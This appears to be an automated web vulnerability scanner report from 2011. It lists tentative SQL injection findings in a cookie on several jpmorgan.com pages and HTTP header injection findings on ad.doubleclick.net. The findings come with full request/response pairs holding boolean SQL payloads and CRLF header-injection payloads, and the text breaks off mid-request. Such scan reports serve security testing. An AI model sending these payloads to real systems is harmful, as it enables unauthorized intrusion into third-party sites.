You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.jpmorgan.com/pages/jpmorgan/investbk/solutions/fixedincome/fx [ARPT cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.jpmorgan.com
Path:   /pages/jpmorgan/investbk/solutions/fixedincome/fx

Issue detail

The ARPT cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the ARPT cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /pages/jpmorgan/investbk/solutions/fixedincome/fx?source=megamenu HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO'%20and%201%3d1--%20; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response 1

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:30:02 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: ARPT=NKOJWQS188.21-cws7214CKJKQ; path=/
Set-Cookie: JpmcSession=Vpm1TcyhnGmWvLxjgChCvgjSjfDWtgbgfVg418dLhGwKyLRfT7S2!1696421816; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 61889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

<!-- page_id: 1159296860718 -->


   
   
       
       
   
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


   <title>Foreign Exchange | J.P. Morgan</title>



   <META NAME="jpmc_lob" CONTENT="Investment Bank" />





   <META NAME="keywords" CONTENT="fx, foreign exchange, currency, morgan direct" />


<meta name="google-site-verification" content="yHbvL6U-Rd7KWvEPHU2xqanjwmr9JqCEKUFACv7pz78" />

<script type="text/javascript">

   var _gaq = _gaq || [];
   _gaq.push(['_setAccount', 'UA-20028469-1']);
   _gaq.push(['_trackPageview']);

   (function() {
       var ga = document.createElement('script'); ga.type = 'text' + '/' + 'javascript'; ga.async = true;
       ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com' + '/' + 'ga.js';
       var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
   })();

</script>



   
       <META NAME="ROBOTS" CONTENT="index,follow,NOODP">
       <META NAME="GOOGLEBOT" CONTENT="NOODP">
   



<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1153920691238&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1153920691266&pagena
...[SNIP]...

Request 2

GET /pages/jpmorgan/investbk/solutions/fixedincome/fx?source=megamenu HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO'%20and%201%3d2--%20; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response 2

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:30:03 GMT
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 61889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

<!-- page_id: 1159296860718 -->


   
   
       
       
   
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


   <title>Foreign Exchange | J.P. Morgan</title>



   <META NAME="jpmc_lob" CONTENT="Investment Bank" />





   <META NAME="keywords" CONTENT="fx, foreign exchange, currency, morgan direct" />


<meta name="google-site-verification" content="yHbvL6U-Rd7KWvEPHU2xqanjwmr9JqCEKUFACv7pz78" />

<script type="text/javascript">

   var _gaq = _gaq || [];
   _gaq.push(['_setAccount', 'UA-20028469-1']);
   _gaq.push(['_trackPageview']);

   (function() {
       var ga = document.createElement('script'); ga.type = 'text' + '/' + 'javascript'; ga.async = true;
       ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com' + '/' + 'ga.js';
       var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
   })();

</script>



   
       <META NAME="ROBOTS" CONTENT="index,follow,NOODP">
       <META NAME="GOOGLEBOT" CONTENT="NOODP">
   



<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1153920691238&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1153920691266&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?
...[SNIP]...

1.2. http://www.jpmorgan.com/tss/General/ACH_Fraud_Solutions/1159383343594 [ARPT cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.jpmorgan.com
Path:   /tss/General/ACH_Fraud_Solutions/1159383343594

Issue detail

The ARPT cookie appears to be vulnerable to SQL injection attacks. The payloads 12195430'%20or%201%3d1--%20 and 12195430'%20or%201%3d2--%20 were each submitted in the ARPT cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /tss/General/ACH_Fraud_Solutions/1159383343594 HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO12195430'%20or%201%3d1--%20; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; s_cc=true; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.5.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_sq=jpmcglobal%2Cjpmorgan%2Cjpmorgantss%2Cjpmorgancash%3D%2526pid%253DGeneral%25253A%252520Security%252520Center%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/tss/General/ACH_Fraud_Solutions/1159383343594%2526ot%253DA%26jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DAsset%252520Management%252520-%252520UK%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/am/uk/press_office%2526ot%253DA

Response 1

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:33:52 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
HOST_SERVICE: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: ARPT=NKOJWQS155.180.188.20CKOML; path=/
Set-Cookie: JpmcSession=ZWHvTcpQ0K8mgj7Wrpm6YpZPYh214QkpT1Kdq8zHDkfGXngqWGHw!-779951483; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 104714




























































































































































































   
   
   










   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   




   




   



   




   




   



   



   











   







   











   
   
   
       
       
                   
       
       
   




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html;CHARSET=iso-8859-1" />

   
   <META name="jpmc_lob" content="Treasury Services">



<TITLE>J.P. Morgan | ACH Fraud Solutions</TITLE>




<META NAME="robots" CONTENT="INDEX,FOLLOW"/>


<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232932&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232960&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232974&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<l
...[SNIP]...

Request 2

GET /tss/General/ACH_Fraud_Solutions/1159383343594 HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO12195430'%20or%201%3d2--%20; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; s_cc=true; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.5.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_sq=jpmcglobal%2Cjpmorgan%2Cjpmorgantss%2Cjpmorgancash%3D%2526pid%253DGeneral%25253A%252520Security%252520Center%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/tss/General/ACH_Fraud_Solutions/1159383343594%2526ot%253DA%26jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DAsset%252520Management%252520-%252520UK%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/am/uk/press_office%2526ot%253DA

Response 2

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:56:00 GMT
Date: Tue, 12 Jul 2011 15:33:57 GMT
Content-Type: text/html; charset=UTF-8
HOST_SERVICE: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 104714




























































































































































































   
   
   










   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   




   




   



   




   




   



   



   











   







   











   
   
   
       
       
                   
       
       
   




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html;CHARSET=iso-8859-1" />

   
   <META name="jpmc_lob" content="Treasury Services">



<TITLE>J.P. Morgan | ACH Fraud Solutions</TITLE>




<META NAME="robots" CONTENT="INDEX,FOLLOW"/>


<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232932&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232960&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232974&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232946&pagename=JPM_redesign%2FJPM_Stylesheet_C%2
...[SNIP]...

1.3. http://www.jpmorgan.com/tss/Product_A-Z/Products_and_Solutions/1104848729254 [ARPT cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.jpmorgan.com
Path:   /tss/Product_A-Z/Products_and_Solutions/1104848729254

Issue detail

The ARPT cookie appears to be vulnerable to SQL injection attacks. The payloads 84051685'%20or%201%3d1--%20 and 84051685'%20or%201%3d2--%20 were each submitted in the ARPT cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /tss/Product_A-Z/Products_and_Solutions/1104848729254 HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO84051685'%20or%201%3d1--%20; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; s_cc=true; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.5.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_sq=jpmcglobal%2Cjpmorgan%2Cjpmorgantss%2Cjpmorgancash%3D%2526pid%253DGeneral%25253A%252520Security%252520Center%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/tss/Product_A-Z/Products_and_Solutions/1104848729254%2526ot%253DA%26jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DAsset%252520Management%252520-%252520UK%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/am/uk/press_office%2526ot%253DA

Response 1

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:33:40 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
HOST_SERVICE: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: ARPT=NKOJWQS155.180.188.20CKOML; path=/
Set-Cookie: JpmcSession=CyQnTcpJpNkFpTTFdcJqwczNxhlLDYQhV8h2vn0tTfgv5pQvqwTr!-779951483; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 106611



























































































































































   

   
   
   
       
   





       



























   
       
   
       
   



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html;CHARSET=iso-8859-1" />

   
   <META name="jpmc_lob" content="Treasury Services">



<TITLE>J.P. Morgan | Treasury Services Product A-Z Index</TITLE>




<META NAME="robots" CONTENT="INDEX,FOLLOW"/>


<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232932&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232960&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232974&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232946&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_
...[SNIP]...

Request 2

GET /tss/Product_A-Z/Products_and_Solutions/1104848729254 HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO84051685'%20or%201%3d2--%20; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; s_cc=true; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.5.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_sq=jpmcglobal%2Cjpmorgan%2Cjpmorgantss%2Cjpmorgancash%3D%2526pid%253DGeneral%25253A%252520Security%252520Center%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/tss/Product_A-Z/Products_and_Solutions/1104848729254%2526ot%253DA%26jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DAsset%252520Management%252520-%252520UK%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/am/uk/press_office%2526ot%253DA

Response 2

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:33:43 GMT
Content-Type: text/html; charset=UTF-8
HOST_SERVICE: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 106611



























































































































































   

   
   
   
       
   





       



























   
       
   
       
   



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html;CHARSET=iso-8859-1" />

   
   <META name="jpmc_lob" content="Treasury Services">



<TITLE>J.P. Morgan | Treasury Services Product A-Z Index</TITLE>




<META NAME="robots" CONTENT="INDEX,FOLLOW"/>


<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232932&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232960&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232974&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232946&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232988&pagename=JP
...[SNIP]...

2. HTTP header injection  previous  next
There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://ad.doubleclick.net/getcamphist [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8ca46%0d%0aae875a6483a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8ca46%0d%0aae875a6483a;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Cappleitunes%2Cappleusitunesipod%2F1%2FH.22.1%2Fs11845888246316%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D12%252F6%252F2011%252012%253A59%253A8%25202%2520300%26pageName%3Ditunes%2520-%2520index%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252F%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.itunes%26c1%3Dmusic%2520-%2520sep%25202010%2520%28us%29%26c4%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252F%26c5%3Dwin32%26c6%3DD%253D%2522%253A%2520%2522%252BpageName%26c9%3Dwindows%26c12%3Dno%2520itunes%26c15%3Dno%2520zip%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c25%3Dother%2520nav%2520or%2520none%26c44%3Dappleglobal%252Cappleitunes%252Cappleusitunesipod%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Ditunes%253D3%26s%3D1920x1200%26c%3D32%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1065%26bh%3D823%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.260.3%253BJava%28TM%29%2520Platform%2520SE%25206%2520U26%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BWPI%2520Detector%25201.3%253BGoogle%2520Update%253BDefault%2520Plug-in%253B%26AQE%3D1&A2S=1;ord=22175180 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8ca46
ae875a6483a
;src=1513429;host=metrics.apple.com/b/ss/appleglobal,appleitunes,appleusitunesipod/1/H.22.1/s11845888246316:
Date: Tue, 12 Jul 2011 17:59:33 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/getcamphist [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload d4dd7%0d%0a1d25cb0b3ad was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Cappleitunes%2Cappleusitunesipod%2F1%2FH.22.1%2Fs11845888246316%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D12%252F6%252F2011%252012%253A59%253A8%25202%2520300%26pageName%3Ditunes%2520-%2520index%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252F%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.itunes%26c1%3Dmusic%2520-%2520sep%25202010%2520%28us%29%26c4%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252F%26c5%3Dwin32%26c6%3DD%253D%2522%253A%2520%2522%252BpageName%26c9%3Dwindows%26c12%3Dno%2520itunes%26c15%3Dno%2520zip%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c25%3Dother%2520nav%2520or%2520none%26c44%3Dappleglobal%252Cappleitunes%252Cappleusitunesipod%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Ditunes%253D3%26s%3D1920x1200%26c%3D32%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1065%26bh%3D823%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.260.3%253BJava%28TM%29%2520Platform%2520SE%25206%2520U26%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BWPI%2520Detector%25201.3%253BGoogle%2520Update%253BDefault%2520Plug-in%253B%26AQE%3D1d4dd7%0d%0a1d25cb0b3ad&A2S=1;ord=22175180 HTTP/1.1
Host: ad.doubleclick.net
